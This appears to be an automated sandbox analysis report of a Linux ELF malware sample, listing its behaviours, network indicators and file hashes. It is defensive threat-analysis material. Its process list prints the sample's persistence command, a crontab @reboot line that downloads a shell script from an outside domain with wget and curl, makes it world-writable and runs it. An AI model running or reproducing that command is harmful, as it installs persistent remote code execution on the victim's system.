Analysis Overview
SHA256: bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62
Threat Level: Shows suspicious behavior
The file bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-10-27 02:50
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-10-27 02:50
Reported: 2024-10-27 02:53
Platform: debian9-armhf-20240611-en
Max time kernel: 144s
Max time network: 136s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
|---|---|---|---|
| Destination IP | 81.169.136.222 | N/A | N/A |
| Destination IP | 178.254.22.166 | N/A | N/A |
| Destination IP | 51.158.108.203 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /var/spool/cron/crontabs/tmp.ObcLt0 | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
|---|---|---|---|
| Changes the process name, possibly in an attempt to hide itself | /bin/sh /etc/init.d/rcS | /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/mounts | /tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf | N/A |
Processes
/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf
[/tmp/bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| DE | 81.169.136.222:53 | kingstonwikkerink.dyn | udp |
| BG | 31.13.248.89:14965 | kingstonwikkerink.dyn | tcp |
| DE | 178.254.22.166:53 | kingstonwikkerink.dyn | udp |
| FR | 51.158.108.203:53 | kingstonwikkerink.dyn | udp |
| UA | 88.151.195.22:6847 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.ObcLt0
| Hash | Value |
|---|---|
| MD5 | 156ee72da2df4c852058bb0a4d6a1c57 |
| SHA1 | ddcde4860a652c8988f3cf45cb742ae199a5c4fa |
| SHA256 | 22d5d14166a842a855fecf8daa2962429aac0da074dff2c5fd31a157d2e3e3f6 |
| SHA512 | 94c14c17c65e0a2c0f1c6cbe79d480ed336c6f79ac4562ba166da7ebf765f8703502bdc8372d5079d818035efe1d7f18c16b0ab94b6e6b155dd9fd77cce78d64 |